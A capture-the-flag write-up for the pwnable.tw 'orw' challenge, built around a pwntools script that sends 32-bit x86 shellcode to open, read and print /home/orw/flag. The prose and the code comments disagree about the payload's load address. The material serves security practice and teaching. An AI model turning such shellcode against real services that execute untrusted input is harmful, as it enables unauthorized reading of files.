Challenge
Solving
Running the binary:
Part of the disassembly of main:
The binary reads our payload, stores it at address 0x8048370, and then runs the code there.
As the problem description says, we should build a shellcode that uses only the open, read and write syscalls.
Here is my python script
#!/usr/bin/env python
# pwnable.tw orw
from pwn import *
# Target switch read by the __main__ block: a truthy value runs the local
# ./orw binary, 0 connects to the remote challenge service.
debug = 0
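def exploit():
    """Assemble the open/read/write payload from the write-up and send it on ``s``.

    The payload is 32-bit x86 code using the ``int 0x80`` syscall interface,
    followed by two NUL-terminated strings. It opens /home/orw/flag, reads up
    to 0x64 bytes into a fixed buffer, and writes the bytes read to fd 1.

    Security-relevant point: the target runs the received bytes as code, and
    a syscall allow-list that still permits open/read/write leaves every file
    readable by the service account open to disclosure.

    The pieces are joined as bytes. On Python 3, asm() returns bytes, so the
    original ''-seeded str concatenation raises TypeError there; the bytes
    sent are unchanged.

    Relies on the module-level tube ``s`` created by the ``__main__`` block.
    """
    code = [
        # fd = open(filename, 0, <ignored>)
        asm('mov eax, 0x5'),        # syscall : open
        # Hard-coded address of the filename string appended below. With the
        # usual 5-byte `mov r32, imm32` encoding the code is 60 (0x3c) bytes,
        # so this presumably assumes a load address of 0x804a060 -- confirm
        # against the binary.
        asm('mov ebx, 0x804a09c'),  # filename
        asm('mov ecx, 0x0'),        # flags (0 = O_RDONLY)
        # NOTE(review): open(2) takes numeric permission bits as its third
        # argument and only consults them with O_CREAT. With flags = 0 this
        # pointer to the trailing "r" string (filename address + 15) is
        # ignored; it is kept so the payload bytes stay the same.
        asm('mov edx, 0x804a0ab'),  # mode
        asm('int 0x80'),
        # n = read(fd, buf, 0x64)
        asm('mov ebx, eax'),        # fd returned by open
        asm('mov eax, 0x3'),        # syscall : read
        asm('mov ecx, 0x804a100'),  # buf (fixed address, assumed writable)
        asm('mov edx, 0x64'),       # count
        asm('int 0x80'),
        # write(1, buf, n)
        asm('mov edx, eax'),        # count = bytes actually read
        asm('mov eax, 0x4'),        # syscall : write
        asm('mov ebx, 0x1'),        # fd (stdout)
        asm('mov ecx, 0x804a100'),  # buf
        asm('int 0x80'),
    ]
    payload = b''.join(code)
    # String data placed directly after the code; the addresses loaded above
    # depend on this exact layout.
    payload += b'/home/orw/flag\x00'
    payload += b'r\x00'
    s.send(payload)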
if __name__ == '__main__':
    # Pick the target: the remote challenge service by default, or the local
    # binary when the module-level `debug` switch is set.
    if not debug:
        s = remote('chall.pwnable.tw', 10001)
    else:
        s = process('./orw')
        # Wait for a keypress before sending anything (presumably so a
        # debugger can be attached to the local process).
        pause()

    # exploit() sends the payload over the module-level tube `s`.
    exploit()
    # Hand the connection to the terminal to show the service's output, then
    # release it once the interactive session ends.
    s.interactive()
    s.close()
FL4G